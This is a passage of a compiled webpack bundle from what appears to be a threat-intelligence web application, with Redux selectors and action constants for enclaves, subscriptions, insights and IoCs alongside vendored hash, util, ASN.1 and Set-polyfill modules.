/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "credentialsTypes", function() { return credentialsTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "accessTypes", function() { return accessTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "patterns", function() { return patterns; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "labels", function() { return labels; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "subscriptionMethods", function() { return subscriptionMethods; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getCurrentEntityTypes", function() { return getCurrentEntityTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getFullEntityTypes", function() { return getFullEntityTypes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getEntityTypesList", function() { return getEntityTypesList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getDefaultEntityTypes", function() { return getDefaultEntityTypes; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_reselect__);




var getEntityTypes = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'entityTypes']);
var getEntityTypesLoading = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'entityTypesLoading']);
var getSelectedEntityTypes = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'selectedEntityTypes']);
var credentialsTypes = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'credentialsTypes']);
var accessTypes = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'accessTypes']);
var patterns = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'patterns']);
var labels = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'labels']);
var subscriptionMethods = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['miscellaneous', 'subscriptionMethods']);

/**
 * Get a Set of the currently selected entity type Ids. See the
 * selectedEntityTypes store for more details.
 */
var getCurrentEntityTypes = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([getEntityTypes, getSelectedEntityTypes], function (entityTypes, selected) {
  return entityTypes.keySeq().toSet().intersect(selected);
});

var getFullEntityTypes = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([getEntityTypes, getCurrentEntityTypes], function (entityTypes, selected) {
  return entityTypes.filter(function (x) {
    return selected.has(x.get('guid'));
  });
});

var getEntityTypesList = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([getEntityTypes], function (x) {
  return x.toList().sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"]);
});

var getDefaultEntityTypes = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([getEntityTypesList], function (entityTypes) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])(entityTypes.filter(function (x) {
    return x.get('default');
  }).map(function (x) {
    return [x.get('guid'), x];
  }));
});

/***/ }),
/* 346 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";

var inherits = __webpack_require__(25)
var MD5 = __webpack_require__(684)
var RIPEMD160 = __webpack_require__(689)
var sha = __webpack_require__(690)
var Base = __webpack_require__(201)

function Hash (hash) {
  Base.call(this, 'digest')

  this._hash = hash
}

inherits(Hash, Base)

Hash.prototype._update = function (data) {
  this._hash.update(data)
}

Hash.prototype._final = function () {
  return this._hash.digest()
}

module.exports = function createHash (alg) {
  alg = alg.toLowerCase()
  if (alg === 'md5') return new MD5()
  if (alg === 'rmd160' || alg === 'ripemd160') return new RIPEMD160()

  return new Hash(sha(alg))
}


/***/ }),
/* 347 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

// NOTE: These type checking functions intentionally don't use `instanceof`
// because it is fragile and can be easily faked with `Object.create()`.

function isArray(arg) {
  if (Array.isArray) {
    return Array.isArray(arg);
  }
  return objectToString(arg) === '[object Array]';
}
exports.isArray = isArray;

function isBoolean(arg) {
  return typeof arg === 'boolean';
}
exports.isBoolean = isBoolean;

function isNull(arg) {
  return arg === null;
}
exports.isNull = isNull;

function isNullOrUndefined(arg) {
  return arg == null;
}
exports.isNullOrUndefined = isNullOrUndefined;

function isNumber(arg) {
  return typeof arg === 'number';
}
exports.isNumber = isNumber;

function isString(arg) {
  return typeof arg === 'string';
}
exports.isString = isString;

function isSymbol(arg) {
  return typeof arg === 'symbol';
}
exports.isSymbol = isSymbol;

function isUndefined(arg) {
  return arg === void 0;
}
exports.isUndefined = isUndefined;

function isRegExp(re) {
  return objectToString(re) === '[object RegExp]';
}
exports.isRegExp = isRegExp;

function isObject(arg) {
  return typeof arg === 'object' && arg !== null;
}
exports.isObject = isObject;

function isDate(d) {
  return objectToString(d) === '[object Date]';
}
exports.isDate = isDate;

function isError(e) {
  return (objectToString(e) === '[object Error]' || e instanceof Error);
}
exports.isError = isError;

function isFunction(arg) {
  return typeof arg === 'function';
}
exports.isFunction = isFunction;

function isPrimitive(arg) {
  return arg === null ||
         typeof arg === 'boolean' ||
         typeof arg === 'number' ||
         typeof arg === 'string' ||
         typeof arg === 'symbol' ||  // ES6 symbol
         typeof arg === 'undefined';
}
exports.isPrimitive = isPrimitive;

exports.isBuffer = Buffer.isBuffer;

function objectToString(o) {
  return Object.prototype.toString.call(o);
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 348 */
/***/ (function(module, exports) {

if (typeof Object.create === 'function') {
  // implementation from standard node.js 'util' module
  module.exports = function inherits(ctor, superCtor) {
    if (superCtor) {
      ctor.super_ = superCtor
      ctor.prototype = Object.create(superCtor.prototype, {
        constructor: {
          value: ctor,
          enumerable: false,
          writable: true,
          configurable: true
        }
      })
    }
  };
} else {
  // old school shim for old browsers
  module.exports = function inherits(ctor, superCtor) {
    if (superCtor) {
      ctor.super_ = superCtor
      var TempCtor = function () {}
      TempCtor.prototype = superCtor.prototype
      ctor.prototype = new TempCtor()
      ctor.prototype.constructor = ctor
    }
  }
}


/***/ }),
/* 349 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {module.exports = function xor (a, b) {
  var length = Math.min(a.length, b.length)
  var buffer = new Buffer(length)

  for (var i = 0; i < length; ++i) {
    buffer[i] = a[i] ^ b[i]
  }

  return buffer
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 350 */,
/* 351 */
/***/ (function(module, exports, __webpack_require__) {

var asn1 = exports;

asn1.bignum = __webpack_require__(63);

asn1.define = __webpack_require__(2727).define;
asn1.base = __webpack_require__(352);
asn1.constants = __webpack_require__(1261);
asn1.decoders = __webpack_require__(2733);
asn1.encoders = __webpack_require__(2735);


/***/ }),
/* 352 */
/***/ (function(module, exports, __webpack_require__) {

var base = exports;

base.Reporter = __webpack_require__(2730).Reporter;
base.DecoderBuffer = __webpack_require__(1260).DecoderBuffer;
base.EncoderBuffer = __webpack_require__(1260).EncoderBuffer;
base.Node = __webpack_require__(2731);


/***/ }),
/* 353 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export SetPoly */
/* harmony export (immutable) */ __webpack_exports__["b"] = setToArray;
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return _Set; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_createClass__ = __webpack_require__(1281);


/**
 * Set implementation based on es6-set polyfill (https://github.com/medikoo/es6-set/blob/master/polyfill.js),
 * with the minimal features used by the SDK.

Copyright (C) 2013 Mariusz Nowak (www.medikoo.com)

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
**/
var SetPoly = /*#__PURE__*/function () {
  // unlike ES6 `Set`, it only accepts an array as first argument iterable
  function SetPoly()
  /*arrayIterable*/
  {
    var _this = this;

    this.__setData__ = [];
    var arrayIterable = arguments[0];
    if (Array.isArray(arrayIterable)) arrayIterable.forEach(function (value) {
      _this.add(value);
    });
  }

  var _proto = SetPoly.prototype;

  _proto.clear = function clear() {
    if (!this.__setData__.length) return;
    this.__setData__.length = 0;
  };

  _proto.add = function add(value) {
    if (this.has(value)) return this;

    this.__setData__.push(value);

    return this;
  };

  _proto.delete = function _delete(value) {
    var index = this.__setData__.indexOf(value);

    if (index === -1) return false;

    this.__setData__.splice(index, 1);

    return true;
  };

  _proto.has = function has(value) {
    return this.__setData__.indexOf(value) !== -1;
  };

  _proto.forEach = function forEach(cb
  /*, thisArg*/
  ) {
    var thisArg = arguments[1];
    if (typeof cb !== 'function') throw new TypeError(cb + ' is not a function');

    for (var i = 0; i < this.__setData__.length; i++) {
      var value = this.__setData__[i];
      cb.call(thisArg, value, value, this);
    }
  };

  Object(__WEBPACK_IMPORTED_MODULE_0__babel_runtime_helpers_esm_createClass__["a" /* default */])(SetPoly, [{
    key: "size",
    get: function get() {
      return this.__setData__.length;
    }
  }]);

  return SetPoly;
}();
function setToArray(set) {
  if (set instanceof SetPoly) {
    return set.__setData__.slice();
  } // if not using SetPoly as set, it means Array.from is supported
  // eslint-disable-next-line compat/compat


  return Array.from(set);
}
/**
 * return the Set constructor to use. If `Array.from` built-in or native Set is not available or it doesn't support the required features,
 * a ponyfill with minimal features is returned instead.
 */

function getSetConstructor() {
  // eslint-disable-next-line compat/compat
  if (typeof Array.from === 'function' && typeof Set === 'function' && Set.prototype && Set.prototype.values) {
    return Set;
  }

  return SetPoly;
}

var _Set = getSetConstructor();

/***/ }),
/* 354 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SECONDS_BEFORE_EXPIRATION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return PUSH_NONRETRYABLE_ERROR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return PUSH_RETRYABLE_ERROR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return PUSH_SUBSYSTEM_UP; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return PUSH_SUBSYSTEM_DOWN; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return MY_SEGMENTS_UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return MY_SEGMENTS_UPDATE_V2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return SEGMENT_UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return SPLIT_KILL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return SPLIT_UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CONTROL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return OCCUPANCY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ControlTypes; });
// time for refresh token
var SECONDS_BEFORE_EXPIRATION = 600; // Internal SDK events, subscribed by SyncManager and PushManager

/**
 * emitted on SSE and Authenticate non-recoverable errors, STREAMING_DISABLED control notification and authentication with pushEnabled false
 * triggers `handleNonRetryableError` call
 */

var PUSH_NONRETRYABLE_ERROR = 'PUSH_NONRETRYABLE_ERROR';
/**
 * emitted on SSE and Authenticate recoverable errors
 * triggers `handleRetryableError` call
 */

var PUSH_RETRYABLE_ERROR = 'PUSH_RETRYABLE_ERROR';
/**
 * emitted on STREAMING_RESUMED control notification, OCCUPANCY different than 0, and SSE onopen event
 * triggers `stopPollingAndSyncAll` call
 */

var PUSH_SUBSYSTEM_UP = 'PUSH_SUBSYSTEM_UP';
/**
 * emitted on STREAMING_PAUSED control notification, OCCUPANCY equal to 0, PUSH_NONRETRYABLE_ERROR and PUSH_RETRYABLE_ERROR events.
 * triggers `startPolling` and `stopWorkers` calls
 */

var PUSH_SUBSYSTEM_DOWN = 'PUSH_SUBSYSTEM_DOWN'; // Update-type push notifications, handled by NotificationProcessor

var MY_SEGMENTS_UPDATE = 'MY_SEGMENTS_UPDATE';
var MY_SEGMENTS_UPDATE_V2 = 'MY_SEGMENTS_UPDATE_V2';
var SEGMENT_UPDATE = 'SEGMENT_UPDATE';
var SPLIT_KILL = 'SPLIT_KILL';
var SPLIT_UPDATE = 'SPLIT_UPDATE'; // Control-type push notifications, handled by NotificationKeeper

var CONTROL = 'CONTROL';
var OCCUPANCY = 'OCCUPANCY';
var ControlTypes = {
  STREAMING_DISABLED: 'STREAMING_DISABLED',
  STREAMING_PAUSED: 'STREAMING_PAUSED',
  STREAMING_RESUMED: 'STREAMING_RESUMED',
  STREAMING_RESET: 'STREAMING_RESET'
};

/***/ }),
/* 355 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SharingGroup", function() { return SharingGroup; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_modules_companies_types_js__ = __webpack_require__(252);





// Raw from the server


var SharingGroup = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: null,
  name: null,
  description: null,
  companies: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()
});

// Support instantiation of companies record
SharingGroup.of = function (x) {
  x = SharingGroup(x);
  return x.set('companies', x.companies.map(__WEBPACK_IMPORTED_MODULE_1_modules_companies_types_js__["a" /* Company */].of));
};

/***/ }),
/* 356 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return SAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return SAVE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return SAVE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DELETE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DELETE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SET_DISPLAY_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/enclave/' + str;
};

var FETCH = prefix('FETCH');
var FETCH_SUCCESS = prefix('FETCH_SUCCESS');
var FETCH_FAILURE = prefix('FETCH_FAILURE');

var SAVE = prefix('SAVE');
var SAVE_SUCCESS = prefix('SAVE_SUCCESS');
var SAVE_FAILURE = prefix('SAVE_FAILURE');

var DELETE = prefix('DELETE');
var DELETE_SUCCESS = prefix('DELETE_SUCCESS');
var DELETE_FAILURE = prefix('DELETE_FAILURE');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

/***/ }),
/* 357 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ACTIVATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return ACTIVATE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return ACTIVATE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return EMAIL_ACTIVATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return EMAIL_ACTIVATE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return EMAIL_ACTIVATE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return FETCH_TEMPLATES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return FETCH_TEMPLATES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return FETCH_TEMPLATES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH_SUBSCRIPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return FETCH_SUBSCRIPTIONS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return FETCH_SUBSCRIPTIONS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_COMPANY_SUBSCRIPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return FETCH_COMPANY_SUBSCRIPTIONS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_COMPANY_SUBSCRIPTIONS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "s", function() { return SET_DISPLAY_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return ADMIN_UNSUBSCRIBE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return ADMIN_UNSUBSCRIBE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return ADMIN_UNSUBSCRIBE_FAILURE; });
var prefix = function prefix(str) {
  return 'station/subscription-management/' + str;
};

var ACTIVATE = prefix('ACTIVATE');
var ACTIVATE_SUCCESS = prefix('ACTIVATE_SUCCESS');
var ACTIVATE_FAILURE = prefix('ACTIVATE_FAILURE');

var EMAIL_ACTIVATE = prefix('EMAIL_ACTIVATE');
var EMAIL_ACTIVATE_SUCCESS = prefix('EMAIL_ACTIVATE_SUCCESS');
var EMAIL_ACTIVATE_FAILURE = prefix('EMAIL_ACTIVATE_FAILURE');

var FETCH_TEMPLATES = prefix('FETCH_TEMPLATES');
var FETCH_TEMPLATES_SUCCESS = prefix('FETCH_TEMPLATES_SUCCESS');
var FETCH_TEMPLATES_FAILURE = prefix('FETCH_TEMPLATES_FAILURE');

var FETCH_SUBSCRIPTIONS = prefix('FETCH_SUBSCRIPTIONS');
var FETCH_SUBSCRIPTIONS_SUCCESS = prefix('FETCH_SUBSCRIPTIONS_SUCCESS');
var FETCH_SUBSCRIPTIONS_FAILURE = prefix('FETCH_SUBSCRIPTIONS_FAILURE');

var FETCH_COMPANY_SUBSCRIPTIONS = prefix('FETCH_COMPANY_SUBSCRIPTIONS');
var FETCH_COMPANY_SUBSCRIPTIONS_SUCCESS = prefix('FETCH_COMPANY_SUBSCRIPTIONS_SUCCESS');
var FETCH_COMPANY_SUBSCRIPTIONS_FAILURE = prefix('FETCH_COMPANY_SUBSCRIPTIONS_FAILURE');

var SET_DISPLAY_OPTIONS = prefix('SET_DISPLAY_OPTIONS');

var ADMIN_UNSUBSCRIBE = prefix('ADMIN_UNSUBSCRIBE');
var ADMIN_UNSUBSCRIBE_SUCCESS = prefix('ADMIN_UNSUBSCRIBE_SUCCESS');
var ADMIN_UNSUBSCRIBE_FAILURE = prefix('ADMIN_UNSUBSCRIBE_FAILURE');

/***/ }),
/* 358 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_DASHBOARD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return REGISTER_ACTIVITY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return SAVE_DATE_RANGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return SET_DEFAULT_ENCLAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return SAVE_DEFAULT_ENCLAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return PAGINATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return PAGINATE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return PAGINATE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_TIME_RANGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_TIME_RANGE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_TIME_RANGE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return SET_DATE_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return APPLY_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return SELECT_ENCLAVE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return SET_ENCLAVE_MENU; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return SET_VIEW_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/insights/' + str;
};

var FETCH_DASHBOARD = prefix('FETCH_DASHBOARD');

var REGISTER_ACTIVITY = prefix('REGISTER_ACTIVITY');

var SAVE_DATE_RANGE = prefix('SAVE_DATE_RANGE');
var SET_DEFAULT_ENCLAVE = prefix('SET_DEFAULT_ENCLAVE');
var SAVE_DEFAULT_ENCLAVE = prefix('SAVE_DEFAULT_ENCLAVE');

var PAGINATE = prefix('PAGINATE');
var PAGINATE_SUCCESS = prefix('PAGINATE_SUCCESS');
var PAGINATE_FAILURE = prefix('PAGINATE_FAILURE');

var FETCH_TIME_RANGE = prefix('FETCH_TIME_RANGE');
var FETCH_TIME_RANGE_SUCCESS = prefix('FETCH_TIME_RANGE_SUCCESS');
var FETCH_TIME_RANGE_FAILURE = prefix('FETCH_TIME_RANGE_FAILURE');

var SET_DATE_OPTIONS = prefix('SET_DATE_OPTIONS');
var APPLY_OPTIONS = prefix('APPLY_OPTIONS');

var SELECT_ENCLAVE = prefix('SELECT_ENCLAVE');
var SET_ENCLAVE_MENU = prefix('SET_ENCLAVE_MENU');
var SET_VIEW_OPTIONS = prefix('SET_VIEW_OPTIONS');

/***/ }),
/* 359 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveCorrelations", function() { return enclaveCorrelations; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "communityCorrelations", function() { return communityCorrelations; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveIoCs", function() { return enclaveIoCs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "communityTrendingIocs", function() { return communityTrendingIocs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "malware", function() { return malware; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "cves", function() { return cves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "viewOptions", function() { return viewOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentTimeFilter", function() { return currentTimeFilter; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveSelection", function() { return enclaveSelection; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "savedRanges", function() { return savedRanges; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultEnclaveName", function() { return defaultEnclaveName; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);




/* Insights and Trends */
var enclaveCorrelations = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'enclaveCorrelations']);
var communityCorrelations = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'communityCorrelations']);
var enclaveIoCs = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'enclaveIoCs']);
var communityTrendingIocs = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'communityTrendingIocs']);
var malware = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'malware']);
var cves = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'cves']);

/* Meta options */
var viewOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'meta', 'view']);
var currentTimeFilter = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'meta', 'timeRange']);
var enclaveSelection = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'meta', 'enclaveSelection']);
var savedRanges = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['insights', 'meta', 'savedRanges']);

/* Name of default/current selected default enclave */
var defaultEnclaveName = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaveSelection, function (selection) {
  return selection.get('defaultEnclaveName');
});

/***/ }),
/* 360 */,
/* 361 */,
/* 362 */,
/* 363 */,
/* 364 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return SET_MODAL_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return FETCH_ATTRIBUTES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return FETCH_ATTRIBUTES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return FETCH_ATTRIBUTES_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return FETCH_ENCLAVE_TAGS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return FETCH_ENCLAVE_TAGS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return FETCH_ENCLAVE_TAGS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "k", function() { return FETCH_INDICATOR_TAGS; });
